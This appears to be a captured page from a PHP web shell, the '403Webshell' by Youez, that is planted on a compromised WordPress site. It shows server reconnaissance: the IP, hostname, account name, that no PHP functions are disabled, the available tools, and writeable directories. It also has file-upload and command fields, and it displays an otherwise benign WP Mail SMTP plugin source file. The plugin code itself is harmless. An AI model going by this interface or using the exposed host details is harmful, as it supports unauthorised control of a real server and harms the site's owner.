403Webshell
Server IP : 104.21.14.103  /  Your IP : 18.221.234.179
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/bnnagency.com/wp-content/plugins/wp-mail-smtp/src/Compatibility/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/bnnagency.com/wp-content/plugins/wp-mail-smtp/src/Compatibility//Compatibility.php
<?php

namespace WPMailSMTP\Compatibility;

use WPMailSMTP\WP;

/**
 * Compatibility.
 * Class for managing compatibility with other plugins.
 *
 * @since 2.8.0
 */
class Compatibility {

	/**
	 * Initialized compatibility plugins.
	 *
	 * @since 2.8.0
	 *
	 * @var array
	 */
	protected $plugins = [];

	/**
	 * Initialize class.
	 *
	 * @since 2.8.0
	 */
	public function init() {

		// Setup compatibility only in admin area.
		if ( WP::in_wp_admin() ) {
			$this->setup_compatibility();
		}
	}

	/**
	 * Setup compatibility plugins.
	 *
	 * @since 2.8.0
	 */
	public function setup_compatibility() {

		$plugins = [
			'admin-2020' => '\WPMailSMTP\Compatibility\Plugin\Admin2020',
		];

		foreach ( $plugins as $key => $classname ) {
			if ( class_exists( $classname ) && is_callable( [ $classname, 'is_applicable' ] ) ) {
				if ( $classname::is_applicable() ) {
					$this->plugins[ $key ] = new $classname();
				}
			}
		}
	}

	/**
	 * Get compatibility plugin.
	 *
	 * @since 2.8.0
	 *
	 * @param string $key Plugin key.
	 *
	 * @return \WPMailSMTP\Compatibility\Plugin\PluginAbstract | false
	 */
	public function get_plugin( $key ) {

		return isset( $this->plugins[ $key ] ) ? $this->plugins[ $key ] : false;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit